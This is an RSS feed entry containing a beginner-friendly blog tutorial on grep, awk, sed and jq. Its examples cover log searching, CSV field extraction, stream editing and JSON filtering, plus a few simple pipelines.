&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/modern-edr-countermeasures-fundamentals-and-practical-guide-to-user-mode-function-hooking.html" rel="noopener noreferrer"&gt;Linux Text Processing: Master grep, awk, sed &amp;amp; jq for Developers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;If you’ve spent any time working in Linux, you know text processing is non-negotiable. Whether you’re parsing gigabytes of server logs, extracting insights from CSV files, automating config edits, or wrangling JSON from APIs—you need tools that work fast and flexibly.&lt;/p&gt;

&lt;p&gt;The good news? Linux comes with four built-in powerhouses: &lt;code&gt;grep&lt;/code&gt;, &lt;code&gt;awk&lt;/code&gt;, &lt;code&gt;sed&lt;/code&gt;, and &lt;code&gt;jq&lt;/code&gt;. Each has a unique superpower, but together they handle 90% of text-related tasks. In this guide, we’re skipping the dry theory and focusing on &lt;em&gt;what you can actually use today&lt;/em&gt;. Let’s dive in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction to Linux Text Processing Tools
&lt;/h2&gt;

&lt;p&gt;Text processing in Linux boils down to four core tasks: searching, extracting, editing, and parsing structured data. These tools are lightweight, pre-installed on most distributions, and designed for command-line efficiency. Here’s a quick breakdown of their roles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;grep&lt;/code&gt;: The “search master” for finding patterns in text&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;awk&lt;/code&gt;: The “data wizard” for extracting and calculating from structured text&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;sed&lt;/code&gt;: The “stream editor” for batch text modifications&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;jq&lt;/code&gt;: The “JSON hero” for filtering and transforming JSON data&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  1. grep: Find Text Like a Pro
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;grep&lt;/code&gt; (short for Global Regular Expression Print) is your first stop for locating lines that match a pattern. It’s lightning-fast, even on large files, and supports regular expressions for granular searches.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Works with basic and extended regular expressions&lt;/li&gt;
&lt;li&gt;  Searches recursively through directories&lt;/li&gt;
&lt;li&gt;  Offers case-insensitive, line numbering, and inverse match options&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Basic Search&lt;/strong&gt;: Find all “ERROR” entries in a log file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep "ERROR" server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Case-Insensitive + Line Numbers&lt;/strong&gt;: Catch “error” or “Error” with line numbers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep -i -n "error" server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Recursive Search&lt;/strong&gt;: Find “TODO” comments in all Python files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep -r "TODO" *.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Invert Match&lt;/strong&gt;: Show lines that &lt;em&gt;don’t&lt;/em&gt; contain “DEBUG” (great for filtering noise):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep -v "DEBUG" server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  2. awk: Extract &amp;amp; Analyze Structured Data
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;awk&lt;/code&gt; isn’t just a tool—it’s a mini-programming language for text. It excels at processing line-by-line structured data (like CSVs or logs with fixed fields) by splitting lines into columns and applying logic.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Splits lines into customizable fields (default: whitespace)&lt;/li&gt;
&lt;li&gt;  Supports conditionals, loops, and arithmetic&lt;/li&gt;
&lt;li&gt;  Uses &lt;code&gt;BEGIN&lt;/code&gt;/&lt;code&gt;END&lt;/code&gt; blocks for setup/teardown tasks&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Extract CSV Fields&lt;/strong&gt;: Print names and cities from &lt;code&gt;users.csv&lt;/code&gt; (columns: name,age,city):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;awk -F',' '{print $1", "$3}' users.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Alice, New York
Bob, London
Charlie, Paris
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Conditional Filtering&lt;/strong&gt;: List users older than 30:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;awk -F',' '$2 &amp;gt; 30 {print $1}' users.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Calculate Totals&lt;/strong&gt;: Sum all ages in the CSV:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;awk -F',' '{sum += $2} END {print sum}' users.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. sed: Batch Edit Text Streams
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;sed&lt;/code&gt; (Stream Editor) is built for modifying text without opening files. It’s perfect for find-and-replace, deleting lines, or inserting content—especially in scripts.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Performs in-place edits or outputs to the terminal&lt;/li&gt;
&lt;li&gt;  Uses regex for pattern matching&lt;/li&gt;
&lt;li&gt;  Non-interactive (ideal for automation)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Find-and-Replace&lt;/strong&gt;: Replace “ERROR” with “WARNING” in &lt;code&gt;server.log&lt;/code&gt; (preview first):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sed 's/ERROR/WARNING/g' server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;In-Place Edit&lt;/strong&gt;: Modify the file directly (add &lt;code&gt;.bak&lt;/code&gt; to create a backup: &lt;code&gt;-i.bak&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sed -i 's/ERROR/WARNING/g' server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Delete Lines&lt;/strong&gt;: Remove all lines containing “DEBUG”:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sed '/DEBUG/d' server.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. jq: Tame JSON Data
&lt;/h2&gt;

&lt;p&gt;With APIs and JSON configs everywhere, &lt;code&gt;jq&lt;/code&gt; is a must-have for parsing JSON in the command line. It turns messy JSON into readable output and lets you filter/transform data with simple syntax.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  Queries nested JSON objects/arrays&lt;/li&gt;
&lt;li&gt;  Supports filtering, mapping, and aggregation&lt;/li&gt;
&lt;li&gt;  Formats output for readability&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Practical Examples
&lt;/h3&gt;

&lt;p&gt;Given &lt;code&gt;data.json&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[
  {"name": "Alice", "age": 25, "city": "New York"},
  {"name": "Bob", "age": 30, "city": "London"},
  {"name": "Charlie", "age": 35, "city": "Paris"}
]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Extract Names&lt;/strong&gt;: Get all names from the JSON array:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;jq '.[].name' data.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Filter by Age&lt;/strong&gt;: Find users older than 30:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;jq '.[] | select(.age &amp;gt; 30) | .name' data.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Combining Tools: Real-World Pipelines
&lt;/h2&gt;

&lt;p&gt;The real magic happens when you chain these tools with Linux pipes (&lt;code&gt;|&lt;/code&gt;). Here are two common workflows:&lt;/p&gt;

&lt;h3&gt;
  
  
  Example 1: Analyze Web Server Logs
&lt;/h3&gt;

&lt;p&gt;Extract IPs and URLs from 404 errors in &lt;code&gt;access.log&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;grep "404" access.log | awk '{print $1, $7}'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Example 2: Transform JSON Logs
&lt;/h3&gt;

&lt;p&gt;Filter &lt;code&gt;/api&lt;/code&gt; endpoints and replace status “200” with “OK” in &lt;code&gt;api.log&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;jq '.[] | select(.endpoint | startswith("/api"))' api.log | sed 's/"status": 200/"status":"OK"/g'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Pro Tips for Mastery
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Test Regex Incrementally&lt;/strong&gt;: Complex patterns break easily—test parts first with &lt;code&gt;grep -E&lt;/code&gt; (extended regex).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Backup Before Editing&lt;/strong&gt;: Always use &lt;code&gt;sed -i.bak&lt;/code&gt; to create backups, or test commands without &lt;code&gt;-i&lt;/code&gt; first.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Learn Common Flags&lt;/strong&gt;: &lt;code&gt;grep&lt;/code&gt;: &lt;code&gt;-i&lt;/code&gt; (case-insensitive), &lt;code&gt;-r&lt;/code&gt; (recursive)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;awk&lt;/code&gt;: &lt;code&gt;-F&lt;/code&gt; (field separator), &lt;code&gt;END&lt;/code&gt; (final action)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;sed&lt;/code&gt;: &lt;code&gt;s/pattern/replace/g&lt;/code&gt; (global replace)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;jq&lt;/code&gt;: &lt;code&gt;.[]&lt;/code&gt; (iterate arrays), &lt;code&gt;select()&lt;/code&gt; (filter)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;man&lt;/code&gt;&lt;/strong&gt; &lt;strong&gt;Use Pages&lt;/strong&gt;: &lt;code&gt;man grep&lt;/code&gt; or &lt;code&gt;man jq&lt;/code&gt; has deep docs for edge cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;grep, awk, sed, and jq aren’t just “tools”—they’re time-savers that turn tedious text tasks into one-liners. The more you experiment with them (start small: parse a log, edit a CSV), the more they’ll become second nature.&lt;/p&gt;

&lt;p&gt;What’s your go-to text processing workflow? Drop a comment below—we’d love to hear how you use these tools in your projects!&lt;/p&gt;

</description>
      <category>linux</category>
    </item>
  </channel>
</rss>
